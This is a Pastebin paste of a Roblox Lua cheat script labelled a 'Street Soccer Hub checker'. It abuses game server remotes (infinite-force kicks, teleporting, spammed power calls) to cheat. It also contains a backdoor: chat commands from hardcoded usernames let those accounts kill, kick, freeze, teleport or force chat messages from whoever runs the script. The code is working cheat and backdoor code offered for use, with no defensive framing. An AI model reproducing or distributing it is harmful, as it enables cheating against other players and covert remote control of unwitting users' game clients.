hussainmahmood

Untitled

Jan 30th, 2023 (edited)
521,947
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.87 KB | None | 0 0
  1. if sLoaded and not _G.IY_DEBUG == true then
  2. warn("Street Soccer Hub checker is already running!")
  3. return
  4. end
  5. pcall(function() getgenv().sLoaded = true end)
  6. tet = true
  7. killtet = true
  8. local check1 = '3bdh_m7trf'
  9. local check2 = 'tghurifjmdks'
  10. local check3 = 'eiusdjhx'
  11. local check4 = ''
  12. local check5 = ''
  13. local check6 = ''
  14. local check7 = ''
  15. local check8 = ''
  16. local check9 = ''
  17. local check10 = ''
  18. local check11 = ''
  19. local check12 = ''
  20. local check13 = ''
  21. for _,P in ipairs(game.Players:GetPlayers()) do
  22. P.Chatted:Connect(function(m)
  23. if m == ';'..'unalloff' then
  24. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  25. if P.Name ~= game.Players.LocalPlayer.Name then
  26. getgenv().loopoff = false
  27. end
  28. end
  29. end
  30. if m == ';'..'alloff' then
  31. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  32. if P.Name ~= game.Players.LocalPlayer.Name then
  33. getgenv().loopoff = true
  34. while getgenv().loopoff do
  35. wait(0.2)
  36. getgenv().loop = false
  37. getgenv().goalkeeper = false
  38. end
  39. end
  40. end
  41. end
  42. if m == ';'..'uninvg' then
  43. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  44. if P.Name ~= game.Players.LocalPlayer.Name then
  45. getgenv().invg = false
  46. end
  47. end
  48. end
  49. if m == ';'..'invg' then
  50. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  51. if P.Name ~= game.Players.LocalPlayer.Name then
  52. getgenv().invg = true
  53. while getgenv().invg do
  54. wait()
  55. getgenv().loop = false
  56. pcall(function()
  57. if game:GetService("Workspace").TPSSystem.TPS.Position.Y >= 11 then
  58. if tostring(game.Players.LocalPlayer.Team) == 'Red' then
  59. local plr = game:GetService("Players").LocalPlayer
  60. local root = plr.Character.HumanoidRootPart
  61. local ball = game:GetService("Workspace").TPSSystem.TPS
  62. Goal = game:GetService("Workspace").TPSSystem.Part1
  63. local Distance = (Goal.CFrame.p - ball.CFrame.p).Magnitude
  64. root.CFrame = CFrame.new(Goal.CFrame.p, ball.CFrame.p) * CFrame.new(0, 0, -Distance - 3)
  65. root.CFrame = CFrame.new(root.Position, Goal.Position)
  66. local args = {
  67. [1] = workspace.TPSSystem.TPS,
  68. [2] = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart,
  69. [3] = 70,
  70. [4] = Vector3.new(math.huge, 1, math.huge)
  71. }
  72.  
  73. workspace.FE.Actions.KickG1:FireServer(unpack(args))
  74. elseif tostring(game.Players.LocalPlayer.Team) == 'Blue' then
  75. local plr = game:GetService("Players").LocalPlayer
  76. local root = plr.Character.HumanoidRootPart
  77. local ball = game:GetService("Workspace").TPSSystem.TPS
  78. Goal = game:GetService("Workspace").TPSSystem.Part2
  79. local Distance = (Goal.CFrame.p - ball.CFrame.p).Magnitude
  80. root.CFrame = CFrame.new(Goal.CFrame.p, ball.CFrame.p) * CFrame.new(0, 0, -Distance - 3)
  81. root.CFrame = CFrame.new(root.Position, Goal.Position)
  82. local args = {
  83. [1] = workspace.TPSSystem.TPS,
  84. [2] = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart,
  85. [3] = 70,
  86. [4] = Vector3.new(math.huge, 1, math.huge)
  87. }
  88.  
  89. workspace.FE.Actions.KickG1:FireServer(unpack(args))
  90. end
  91. end
  92. end)
  93. end
  94. end
  95. end
  96. end
  97. if m == ';'..'usep' then
  98. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  99. if P.Name ~= game.Players.LocalPlayer.Name then
  100. local a = 0
  101. repeat
  102. task.wait()
  103. a=a+1
  104. workspace.FE.Powers.Bomb:FireServer()
  105. workspace.FE.Powers.Wall:FireServer()
  106. workspace.FE.Powers.Burn:FireServer()
  107. workspace.FE.Powers.Spike:FireServer()
  108. until a >= 300
  109. end
  110. end
  111. end
  112. if m == ';'..'detect' then
  113. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  114. if P.Name ~= game.Players.LocalPlayer.Name then
  115. local args = {
  116. [1] = "I'm Hacker!",
  117. [2] = "All"
  118. }
  119.  
  120. game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
  121. end
  122. end
  123. end
  124. if m == ';'..'unloopkill' then
  125. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  126. if P.Name ~= game.Players.LocalPlayer.Name then
  127. getgenv().loopkill = false
  128. end
  129. end
  130. end
  131. if m == ';'..'loopkill' then
  132. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  133. if P.Name ~= game.Players.LocalPlayer.Name then
  134. getgenv().loopkill = true
  135. while getgenv().loopkill do
  136. wait(0.1)
  137. pcall(function() game.Players.LocalPlayer.Character.Head:Destroy() end)
  138. end
  139. end
  140. end
  141. end
  142. if m == ';'..'kill' then
  143. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  144. if P.Name ~= game.Players.LocalPlayer.Name then
  145. pcall(function()
  146. game.Players.LocalPlayer.Character.Head:Destroy()
  147. end)
  148. end
  149. end
  150. end
  151. if m == ';'..'bring' then
  152. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  153. if P.Name ~= game.Players.LocalPlayer.Name then
  154. pcall(function()
  155. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(P.Character.HumanoidRootPart.Position)
  156. end)
  157. end
  158. end
  159. end
  160. if m == ';'..'kick' then
  161. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  162. if P.Name ~= game.Players.LocalPlayer.Name then
  163. pcall(function()
  164. game.Players.LocalPlayer:kick('You Have Been Kicked By Hub Mod')
  165. end)
  166. end
  167. end
  168. end
  169. if m == ';'..'freeze' then
  170. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  171. if P.Name ~= game.Players.LocalPlayer.Name then
  172. if tet then
  173. tet = false
  174. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
  175. else
  176. tet = true
  177. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
  178. end
  179. end
  180. end
  181. end
  182. end)
  183. end
  184. game.Players.PlayerAdded:Connect(function(P)
  185. game.Players[P.Name].Chatted:Connect(function(m)
  186. if m == ';'..'usep' then
  187. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  188. if P.Name ~= game.Players.LocalPlayer.Name then
  189. local a = 0
  190. repeat
  191. task.wait()
  192. a=a+1
  193. workspace.FE.Powers.Bomb:FireServer()
  194. workspace.FE.Powers.Wall:FireServer()
  195. workspace.FE.Powers.Burn:FireServer()
  196. workspace.FE.Powers.Spike:FireServer()
  197. until a >= 300
  198. end
  199. end
  200. end
  201. if m == ';'..'detect' then
  202. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  203. if P.Name ~= game.Players.LocalPlayer.Name then
  204. local args = {
  205. [1] = "I'm Hacker!",
  206. [2] = "All"
  207. }
  208.  
  209. game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
  210. end
  211. end
  212. end
  213. if m == ';'..'unloopkill' then
  214. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  215. if P.Name ~= game.Players.LocalPlayer.Name then
  216. getgenv().loopkill = false
  217. end
  218. end
  219. end
  220. if m == ';'..'loopkill' then
  221. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  222. if P.Name ~= game.Players.LocalPlayer.Name then
  223. getgenv().loopkill = true
  224. while getgenv().loopkill do
  225. wait(0.1)
  226. pcall(function() game.Players.LocalPlayer.Character.Head:Destroy() end)
  227. end
  228. end
  229. end
  230. end
  231. if m == ';'..'kill' then
  232. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  233. if P.Name ~= game.Players.LocalPlayer.Name then
  234. pcall(function()
  235. game.Players.LocalPlayer.Character.Head:Destroy()
  236. end)
  237. end
  238. end
  239. end
  240. if m == ';'..'bring' then
  241. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  242. if P.Name ~= game.Players.LocalPlayer.Name then
  243. pcall(function()
  244. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(P.Character.HumanoidRootPart.Position)
  245. end)
  246. end
  247. end
  248. end
  249. if m == ';'..'kick' then
  250. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  251. if P.Name ~= game.Players.LocalPlayer.Name then
  252. pcall(function()
  253. game.Players.LocalPlayer:kick('You Have Been Kicked By Hub Mod')
  254. end)
  255. end
  256. end
  257. end
  258. if m == ';'..'freeze' then
  259. if P.Name == check1 or P.Name == check2 or P.Name == check3 or P.Name == check4 or P.Name == check6 or P.Name == check7 or P.Name == check8 or P.Name == check9 or P.Name == check10 or P.Name == check11 or P.Name == check12 or P.Name == check13 then
  260. if P.Name ~= game.Players.LocalPlayer.Name then
  261. if tet then
  262. tet = false
  263. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
  264. else
  265. tet = true
  266. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
  267. end
  268. end
  269. end
  270. end
  271. end)
  272. end)
Advertisement
Add Comment
Please, Sign In to add comment